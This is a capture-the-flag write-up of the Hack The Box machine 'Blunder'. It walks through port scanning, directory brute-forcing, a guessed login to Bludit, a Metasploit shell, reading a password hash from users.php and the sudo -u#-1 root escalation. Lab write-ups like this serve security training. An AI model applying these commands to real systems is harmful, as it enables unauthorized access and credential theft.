Blunder - [HTB]
Table of Contents
Introduction
Blunder is an easy virtual machine based in the use of gathering information and a bad password in order to get some credentials to be used then by metasploit so we can get a shell and finally use a simple exploit in order to get root privileges.
Enumeration
As always, I started with a basic nmap command thus I know every open port in this machine.
sudo nmap -sS -T5 -n -p- --open 10.10.10.191 -oN AllPorts.txt
In this case, I only got a simple 80 port, so I decided a more in depth scan to watch if there is something wrong with this port.
sudo nmap -sV -sC -p80 10.10.10.191 -oN portsDepth.txt
The result of this scan was less than nothing I have to say. So I decided to have a look at what is in this Apache web server.
It turned out to be something like a personal blog where this “user” post random things.
For the purpose of getting more information I ran gobuster to look for hidden directories.
gobuster dir -t 20 -u http://10.10.10.191/ -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Directories.txt
Between all the directories there was a login form, as you can see in the snapshot below.
I was looking for some exploits related with bludit via searchsploit.
Unfortunately, every single one required credentials to be run.
After a long time, I decided to look for some hidden files, thus I ran this command.
gobuster dir -t 20 -u http://10.10.10.191/ -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
Showing up two a “todo.txt” file, with a possible username called “fergus”
However, I still needed the password so having a look at the posts I found a strange character name (Written without any space… weird).
Thus, using this data I could get access to the bludit dashboard. Hence, I could experiment those exploits I told before.
Explotation
I went directly with metasploit, adding the needed values and changing the LHOST ip address.
Then, I execute it getting a simple shell.
Privilege escalation
This part is divided in two because the first part handles with getting the hugo credentials and the second part in being root.
Part 1
Due to the user www-data doesn’t have enough permissions to show the flag stored at /home/hugo/user.txt.
I looked for some credentials inside the /var/www/ directory due to there was 2 instances of bludit I thought it was a good option.
grep -iR "hugo" . 2\> /dev/null
Inside the file “./bludit-3.10.0a/bl-content/databases/users.php” was stored Hugo’s password.
cat ./bludit-3.10.0a/bl-content/databases/users.php
Instead of identifying the hash, trying to crack it later I preferred using crackstation to get the actual password.
Once, I got the hugo’s account and user.txt flag, I went for the root flag.
Part 2
As I always do, I looked for some command that hugo could ran as sudo. However, due to meterpreter I needed the tty on my shell.
So I used python.
$ python -c 'import pty; pty.spawn("/bin/bash")'
Once fixed it, appeared to be that hugo couldn’t run /bin/bash but searching on the Internet I found out this exploit.
sudo -u\#-1 /bin/bash
Becoming root, getting the root flag.